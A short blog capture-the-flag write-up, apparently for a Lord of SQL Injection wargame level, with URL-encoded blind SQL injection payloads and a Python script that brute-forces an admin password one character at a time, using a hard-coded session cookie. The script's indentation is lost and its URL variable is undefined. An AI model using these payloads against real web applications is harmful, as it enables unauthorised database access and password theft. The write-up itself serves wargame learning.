?pw=1&no=1%20%7C%7C%20id%20like%20%22admin%22%20%26%26length(pw)%20like%208
?pw=1&no=1%20||%20id%20like%20%22admin%22%20%26%26right(left(pw,1),1)%20like%20”a”
import requests
headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {'PHPSESSID':'25g6h0pbijn3arrdalpfkie222'}
'''
?pw=1&no=1%20||%20id%20like%20%22admin%22%20%26%26right(left(pw,1),1)%20like%20a
'''
for x in range(8):
for c in range(33, 125):
rs = requests.get(url + '?pw=1&no=1%20||%20id%20like%20%22admin%22%20%26%26right(left(pw,' + str(x+1) + '),1)%20like%20"' + chr(c) +'"' , headers=headers, cookies=cookies)
text = rs.text
if("<h2>Hello admin</h2>" in text):
print(str(x+1) + " " + chr(c) + " find it")
'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글
| [LOS1] giant (0) | 2018.09.22 |
|---|---|
| [LOS1] bugbear (0) | 2018.09.22 |
| [LOS1] golem (0) | 2018.09.22 |
| [LOS1] skelleton (0) | 2018.09.22 |
| [LOS1] vampire (0) | 2018.09.22 |